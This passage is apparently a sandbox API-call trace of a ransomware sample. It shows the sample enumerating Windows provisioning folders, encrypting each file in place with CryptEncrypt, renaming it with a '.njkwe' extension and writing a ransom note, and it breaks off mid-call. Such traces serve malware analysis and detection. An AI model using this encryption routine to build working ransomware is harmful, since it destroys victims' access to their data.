(normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.181] GetProcessHeap () returned 0xbe0000 [0076.181] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.181] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f8c279, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f8c279, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f8c279, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="")) returned 1 [0076.181] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0076.181] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0076.181] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0076.181] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0076.181] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0076.181] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml") returned 100 [0076.181] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0076.181] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.181] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0076.181] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.181] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.181] GetTickCount () returned 0x115362f [0076.182] GetTickCount () returned 0x115362f [0076.182] GetTickCount () returned 0x115362f [0076.182] GetTickCount () returned 0x115362f [0076.182] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0076.182] GetProcessHeap () returned 0xbe0000 [0076.182] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.182] ReadFile (in: hFile=0x434, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0076.183] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.183] WriteFile (in: hFile=0x434, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0076.183] GetProcessHeap () returned 0xbe0000 [0076.183] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.183] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.183] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0076.184] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0076.184] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0076.184] CloseHandle (hObject=0x434) returned 1 [0076.184] GetProcessHeap () returned 0xbe0000 [0076.184] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.184] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0076.184] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.185] GetProcessHeap () returned 0xbe0000 [0076.185] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.185] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0076.185] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0076.185] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0076.185] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0076.185] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0076.185] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0076.185] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov") returned 85 [0076.185] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0076.185] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0076.185] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.185] GetProcessHeap () returned 0xbe0000 [0076.185] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.185] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*") returned 87 [0076.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a0a0 [0076.201] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.201] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.202] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.202] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.202] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.202] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\.") returned 87 [0076.203] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.203] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.203] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.203] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.203] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.203] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.203] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.203] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\..") returned 88 [0076.203] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.203] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.203] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0076.203] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0076.203] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0076.203] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0076.203] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0076.203] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0076.203] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime") returned 93 [0076.203] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0076.203] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0076.203] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.203] GetProcessHeap () returned 0xbe0000 [0076.204] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0076.204] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*") returned 95 [0076.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19e20 [0076.204] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.204] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.204] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.204] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.204] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.204] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\.") returned 95 [0076.204] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.204] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.204] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.204] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.204] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.204] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.204] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.204] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\..") returned 96 [0076.204] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.204] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.204] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f3fdc3, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f3fdc3, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f66020, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_EnergyEstimationEngine.provxml", cAlternateFileName="")) returned 1 [0076.204] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Windows") returned -1 [0076.204] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="$Recycle.bin") returned 1 [0076.204] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="System Volume Information") returned -1 [0076.204] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Program Files") returned -1 [0076.204] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Program Files (x86)") returned -1 [0076.204] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml") returned 133 [0076.204] StrStrIW (lpFirst="0__Power_EnergyEstimationEngine.provxml", lpSrch=".njkwe") returned 0x0 [0076.204] lstrcmpW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.204] lstrcmpW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="taridd") returned -1 [0076.205] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\0__Power_Ener", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.205] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\0__power_energyestimationengine.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.205] GetTickCount () returned 0x115364f [0076.205] GetTickCount () returned 0x115364f [0076.205] GetTickCount () returned 0x115364f [0076.205] GetTickCount () returned 0x115364f [0076.205] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.205] GetProcessHeap () returned 0xbe0000 [0076.205] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.205] ReadFile (in: hFile=0x43c, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380edc4*=0x663, lpOverlapped=0x0) returned 1 [0076.207] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffff99d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.207] WriteFile (in: hFile=0x43c, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x663, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380edc4*=0x663, lpOverlapped=0x0) returned 1 [0076.207] GetProcessHeap () returned 0xbe0000 [0076.207] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.207] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.207] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.207] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.207] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.207] CloseHandle (hObject=0x43c) returned 1 [0076.207] GetProcessHeap () returned 0xbe0000 [0076.208] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.208] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml_r00t_{3sXlE5}.njkwe") returned 153 [0076.208] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\0__power_energyestimationengine.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\0__power_energyestimationengine.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.208] GetProcessHeap () returned 0xbe0000 [0076.208] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.208] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f3fdc3, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f3fdc3, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f66020, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_EnergyEstimationEngine.provxml", cAlternateFileName="")) returned 0 [0076.208] FindClose (in: hFindFile=0xc19e20 | out: hFindFile=0xc19e20) returned 1 [0076.208] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 125 [0076.208] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0076.209] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0076.209] CloseHandle (hObject=0x438) returned 1 [0076.210] GetProcessHeap () returned 0xbe0000 [0076.210] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0076.210] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f66020, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f66020, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f66020, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0076.210] lstrcmpiW (lpString1="RunTime.xml", lpString2="Windows") returned -1 [0076.210] lstrcmpiW (lpString1="RunTime.xml", lpString2="$Recycle.bin") returned 1 [0076.210] lstrcmpiW (lpString1="RunTime.xml", lpString2="System Volume Information") returned -1 [0076.210] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files") returned 1 [0076.210] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files (x86)") returned 1 [0076.210] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml") returned 97 [0076.210] StrStrIW (lpFirst="RunTime.xml", lpSrch=".njkwe") returned 0x0 [0076.210] lstrcmpW (lpString1="RunTime.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.210] lstrcmpW (lpString1="RunTime.xml", lpString2="taridd") returned -1 [0076.210] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.210] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0076.210] GetTickCount () returned 0x115364f [0076.210] GetTickCount () returned 0x115364f [0076.210] GetTickCount () returned 0x115364f [0076.210] GetTickCount () returned 0x115364f [0076.210] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0076.210] GetProcessHeap () returned 0xbe0000 [0076.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.210] ReadFile (in: hFile=0x438, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f04c*=0x1cc, lpOverlapped=0x0) returned 1 [0076.211] SetFilePointerEx (in: hFile=0x438, 